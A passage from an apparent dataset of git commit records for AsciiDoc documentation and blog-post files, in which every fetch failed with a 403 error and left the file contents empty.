403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06b46d32363558af08f36121c6d3374adeb0e818","subject":"Update 2017-03-30-Website-update.adoc","message":"Update 2017-03-30-Website-update.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-03-30-Website-update.adoc","new_file":"_posts\/2017-03-30-Website-update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be0cfad1f08bd16cf3477ff51d481a7c2e089694","subject":"Update dss-documentation.adoc","message":"Update dss-documentation.adoc\n\nNewline added for correct list rendering.","repos":"esig\/dss,openlimit-signcubes\/dss,alisdev\/dss,zsoltii\/dss,esig\/dss,zsoltii\/dss,alisdev\/dss,openlimit-signcubes\/dss","old_file":"dss-cookbook\/src\/main\/asciidoc\/dss-documentation.adoc","new_file":"dss-cookbook\/src\/main\/asciidoc\/dss-documentation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alisdev\/dss.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"85b1124b8d16817ef9d974bf78a2016491a64e5e","subject":"Update 2015-08-15-Een-test.adoc","message":"Update 2015-08-15-Een-test.adoc","repos":"PauloMoekotte\/PauloMoekotte.github.io,PauloMoekotte\/PauloMoekotte.github.io,PauloMoekotte\/PauloMoekotte.github.io","old_file":"_posts\/2015-08-15-Een-test.adoc","new_file":"_posts\/2015-08-15-Een-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PauloMoekotte\/PauloMoekotte.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98136c0bc574d6e285394ac2acd4a8785d492ebb","subject":"Adding README-pt.adoc","message":"Adding README-pt.adoc\n","repos":"anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io","old_file":"docs\/README-pt.adoc","new_file":"docs\/README-pt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/dev.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"805e7238b7cf93b22d27d0e6869d653e0ee14429","subject":"Set location for image files","message":"Set location for image files\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b66a1ea002cc7784997f5647522f21888c64d5d8","subject":":memo: WebdriverIO","message":":memo: WebdriverIO\n","repos":"syon\/refills","old_file":"src\/refills\/selenium\/webdriverio.adoc","new_file":"src\/refills\/selenium\/webdriverio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"5038d32ac5ce4f804d6a94c3a351247fcc6c9c52","subject":"Deleted 2015-5-10-uGUI.adoc","message":"Deleted 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGUI.adoc","new_file":"2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e864ac8c47db75b231c982d631ace42d343fe7f9","subject":"Update 2015-05-17-Neues-Githubrepository.adoc","message":"Update 2015-05-17-Neues-Githubrepository.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-17-Neues-Githubrepository.adoc","new_file":"_posts\/2015-05-17-Neues-Githubrepository.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eab11a1471812c2cd889f2f0f57ad88e695dfbfd","subject":"Update 2017-05-28-Acemice-Belki-Hadsizce.adoc","message":"Update 2017-05-28-Acemice-Belki-Hadsizce.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-05-28-Acemice-Belki-Hadsizce.adoc","new_file":"_posts\/2017-05-28-Acemice-Belki-Hadsizce.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"547c95af6f8c26cfe74ea60fb0219491573de35e","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/phoneless.adoc","new_file":"content\/writings\/phoneless.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b149b1b113155d44236aba8e18dcad0f96707001","subject":"OTA-2543: Doc on bitbaking and running Primary and Secondary images on QEMU","message":"OTA-2543: Doc on bitbaking and running Primary and Secondary images on QEMU\n\nSigned-off-by: Mike Sul <c4cf997f44ef6c8bd7ff6dc848cd2f9ad1cc931e@here.com>\n","repos":"advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp","old_file":"docs\/posix-secondaries-bitbaking.adoc","new_file":"docs\/posix-secondaries-bitbaking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"2d8772c0487573dd6eff659660c30169108bf3ce","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 
2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5708138d1041c107bfdbd83452a8804b7cc658b","subject":"Tweak spelling","message":"Tweak spelling\n","repos":"lassik\/extract,lassik\/extract","old_file":"extract.1.adoc","new_file":"extract.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lassik\/extract.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"2a87e14dfff7985453a6dfe27eb01ff182695c33","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae816dbc6eff341bee117b15a929bcce0f5b93dd","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"145f4fe4b8a5d958995b9d26df08edb800d05a2d","subject":"Update 2016-09-26-Hello-World.adoc","message":"Update 2016-09-26-Hello-World.adoc","repos":"mozillahonduras\/mozillahonduras.github.io,mozillahonduras\/mozillahonduras.github.io,mozillahonduras\/mozillahonduras.github.io,mozillahonduras\/mozillahonduras.github.io","old_file":"_posts\/2016-09-26-Hello-World.adoc","new_file":"_posts\/2016-09-26-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mozillahonduras\/mozillahonduras.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7059a01c8aad50e6b0e90529c86be2853e7e3cf8","subject":"Update 2015-04-05-Beat-yourself.adoc","message":"Update 2015-04-05-Beat-yourself.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-04-05-Beat-yourself.adoc","new_file":"_posts\/2015-04-05-Beat-yourself.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4b7d876637bc5b1c3851500cb382cc34ae325fe","subject":"Update 
2016-01-23-XML-Prague-2016.adoc","message":"Update 2016-01-23-XML-Prague-2016.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6340441b9a30f3d8ae36f78c6c371d02c3eef05f","subject":"y2b create post The LEGO Laptop!","message":"y2b create post The LEGO Laptop!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-21-The-LEGO-Laptop.adoc","new_file":"_posts\/2016-07-21-The-LEGO-Laptop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4cd3a91603742d4ed11c8410ad4db87c0944b4e4","subject":"Update 2016-12-01-Exploit-sur-Tor.adoc","message":"Update 2016-12-01-Exploit-sur-Tor.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Exploit-sur-Tor.adoc","new_file":"_posts\/2016-12-01-Exploit-sur-Tor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dadc31b09b8de90cf0817048df3d271796555750","subject":"#169: added README for context","message":"#169: added README for context\n","repos":"m-m-m\/util,m-m-m\/util","old_file":"context\/README.adoc","new_file":"context\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/util.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3cf61ba5a2c5a6584db615fb5b5ae3b7ff6cfc71","subject":"added ADR for the JUnit test engine","message":"added ADR for the JUnit test engine\n\n","repos":"Drakojin\/livingdoc2,bitterblue\/livingdoc2,testIT-LivingDoc\/livingdoc2,LivingDoc\/livingdoc,pkleimann\/livingdoc,Drakojin\/livingdoc2,pkleimann\/livingdoc2,LivingDoc\/livingdoc,LivingDoc\/livingdoc,testIT-LivingDoc\/livingdoc2,bitterblue\/livingdoc2,bitterblue\/livingdoc2,pkleimann\/livingdoc,pkleimann\/livingdoc,Drakojin\/livingdoc2,pkleimann\/livingdoc2","old_file":"doc\/decisions\/adr-004-implement-junit5-engine.adoc","new_file":"doc\/decisions\/adr-004-implement-junit5-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitterblue\/livingdoc2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d7e4a493554037559bbee48a71a97c14ec793dda","subject":"[Docs] Add link to es-kotlin-wrapper-client (#32618)","message":"[Docs] Add link to es-kotlin-wrapper-client (#32618)\n\nES Kotlin Wrapper client is a library that wraps the official Highlevel Elasticsearch HTTP client for 
Java.\r\n","repos":"HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch","old_file":"docs\/community-clients\/index.asciidoc","new_file":"docs\/community-clients\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59e4a15326a4013aaad6ea6d1a1423c8afcbc6b6","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/01\/14\/deref.adoc","new_file":"content\/news\/2022\/01\/14\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"56f0ec6a8185919dfe6b6d63a163f4e3dcce0242","subject":"Update 2016-07-24-OSX-cache-clean.adoc","message":"Update 2016-07-24-OSX-cache-clean.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c6fca303606c9f55c04f79d9b25d34706f5905b","subject":"Update 2017-11-04-Richard-Bellman.adoc","message":"Update 2017-11-04-Richard-Bellman.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-11-04-Richard-Bellman.adoc","new_file":"_posts\/2017-11-04-Richard-Bellman.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3277fe3f9990a10faae08a218db7ec6d6577a8dc","subject":"docs: Add Gerrit HTTP endpoint instructions","message":"docs: Add Gerrit HTTP endpoint instructions\n\nSome users cannot use SSH to connect to Gerrit. 
We should provide\nexplicit instructions for these users on how to submit a patch via\nGerrit so they don't have to figure it out themselves from the Gerrit\ndocs.\n\nChange-Id: I70eb2abf6d4c11500d50be27e398bdf0cb3f85c2\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12218\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9166462bcb570f84bb3fd6704a4289bf1823e98e","subject":"Update 2015-02-29-Ideen-fur-Posts.adoc","message":"Update 2015-02-29-Ideen-fur-Posts.adoc","repos":"nobodysplace\/nobodysplace.github.io,nobodysplace\/nobodysplace.github.io,nobodysplace\/nobodysplace.github.io","old_file":"_posts\/2015-02-29-Ideen-fur-Posts.adoc","new_file":"_posts\/2015-02-29-Ideen-fur-Posts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nobodysplace\/nobodysplace.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37a0c763cefa763837a52f1ed3839c066c327e7d","subject":"[DOCS] Adds placeholder for Go client documentation (#39379)","message":"[DOCS] Adds placeholder for Go client documentation (#39379)\n\n","repos":"coding0011\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/go\/index.asciidoc","new_file":"docs\/go\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9294feae977f4fae3b3603d26404f082f8ecfa41","subject":"[WIP] Add docs for Cassandra connector","message":"[WIP] Add docs for Cassandra 
connector\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"docs\/connectors\/cassandra.asciidoc","new_file":"docs\/connectors\/cassandra.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7906e6d4b46eb9e686c2757f798dc13d5144128c","subject":"Update 2015-02-10-Lobby-GitHub-for-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","message":"Update 2015-02-10-Lobby-GitHub-for-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2015-02-10-Lobby-GitHub-for-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","new_file":"_posts\/2015-02-10-Lobby-GitHub-for-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3c4e6d98450a4d3e5757f63787ee86fc5aff413","subject":"Update 2017-01-15-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc","message":"Update 2017-01-15-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2017-01-15-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc","new_file":"_posts\/2017-01-15-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c9092e97b2aad225fa3aeb9a5394be3ae922eab","subject":"y2b create post You've Never Seen Bananas Do This...","message":"y2b create post You've Never Seen Bananas Do This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-25-Youve-Never-Seen-Bananas-Do-This.adoc","new_file":"_posts\/2017-02-25-Youve-Never-Seen-Bananas-Do-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbfac1d32442c5a067fe8bd1413b5976895d0a54","subject":"Update 2016-06-22-Test-Blog.adoc","message":"Update 2016-06-22-Test-Blog.adoc","repos":"arabindamoni\/hubpress.io,arabindamoni\/hubpress.io,arabindamoni\/hubpress.io,arabindamoni\/hubpress.io","old_file":"_posts\/2016-06-22-Test-Blog.adoc","new_file":"_posts\/2016-06-22-Test-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arabindamoni\/hubpress.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f8684b3661d5db7bbca2e35ea07c70b647f5a2d","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdc1743a0e78449c84fcfbdb84dd0d4adce277fe","subject":"Update 2018-08-25-Laravel56.adoc","message":"Update 2018-08-25-Laravel56.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56.adoc","new_file":"_posts\/2018-08-25-Laravel56.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ee1525055f369d9748da1860230b52346d9e45e","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52f2194544ce26f3787c6f32bfcd709522108b56","subject":"Update 2015-09-15-HubPressASCiiDOC.adoc","message":"Update 2015-09-15-HubPressASCiiDOC.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-15-HubPressASCiiDOC.adoc","new_file":"_posts\/2015-09-15-HubPressASCiiDOC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7e57b753aee3595edc4ca8c05d00d05a71626d6","subject":"Update 2016-02-25-list-questions-c.adoc","message":"Update 2016-02-25-list-questions-c.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-02-25-list-questions-c.adoc","new_file":"_posts\/2016-02-25-list-questions-c.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddae5a31426c7df011ac0055236e2caf7df8e525","subject":"Update 2017-10-28-.adoc","message":"Update 
2017-10-28-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-28-.adoc","new_file":"_posts\/2017-10-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79b46cf7ee9a194ee617afadcc9cce98aeac16c2","subject":"Initial draft of internal TLS design","message":"Initial draft of internal TLS design\n","repos":"EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design\/internal-tls.adoc","new_file":"documentation\/design\/internal-tls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b072d7b148392012643e1fec727117f9115f777","subject":"Update 2017-08-12-Capture-Outgoing-httphttps-Request-from-web-Application-hosted-on-Azure-App-Service.adoc","message":"Update 